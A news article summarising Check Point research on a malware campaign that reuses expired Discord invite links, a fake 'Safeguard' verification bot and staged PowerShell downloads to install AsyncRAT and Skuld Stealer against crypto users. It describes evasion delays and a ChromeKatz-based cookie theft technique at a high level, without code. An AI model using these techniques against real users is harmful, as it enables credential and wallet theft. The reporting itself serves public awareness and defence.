Malware Campaign Hijacks Old Discord Links To Hack Crypto Users

Hackers are hijacking expired Discord invite links to trick users into malware infections that steal crypto wallets and bypass browser security tools.

According to CheckPoint research team, cybercriminals are using expired Discord invite links to lead users toward malicious servers that result in advanced malware infections.

Attackers hijack former invite links, which belonged to trusted communities, to send users toward imitation Discord servers. The fake Discord servers trick their users into downloading dangerous malware, including AsyncRAT and Skuld Stealer, cryptocurrency wallet-targeting malware.

The attackers exploit how Discord generates invite links by using both temporary and permanent linking capabilities. Attackers gain access to abandoned links by claiming them back to set harmful Discord servers.

In this way, users who click on what appears to be valid invitations from social media or outdated posts are automatically taken to malicious servers controlled by hackers.

Inside these fake servers, users encounter a bot called “Safeguard” that presents a fake verification process. After users initiate the verification process, they access a phishing website, which runs a dangerous PowerShell command.

The command retrieves malicious software from GitHub, as well as Bitbucket and Pastebin platforms, in order to make the operation blend in with standard web traffic.

The malware executes multiple stages to evade detection systems. A GitHub link serves as the first download target for a PowerShell script. The loader retrieves the encrypted malware from Bitbucket before decrypting it for installation on the user’s computer system.

The last payloads—AsyncRAT and Skuld Stealer—enable attackers to remotely control systems and steal important information, including user credentials, together with crypto wallet details from Exodus and Atomic applications. The malware implements timed delays, up to 15 minutes, to evade automated security systems.

Additionally, the cyberattackers discovered a method to circumvent the protection provided by Google Chrome’s App Bound Encryption for cookies. The attackers modified ChromeKatz to enable direct extraction of login cookies from Chrome, Edge, and Brave browser memory.

The attacks have targeted users throughout the United States, along with Vietnam, France, and Germany, as well as additional nations. The attackers seem to target cryptocurrency users because their malware specifically targets wallet credentials and recovery phrases.

The researchers believe cybercriminals will develop new methods despite Discord disabling the specific bot used in this campaign. Users should protect themselves from such attacks by avoiding outdated Discord invites, while being cautious about verification requests and maintaining current antivirus software.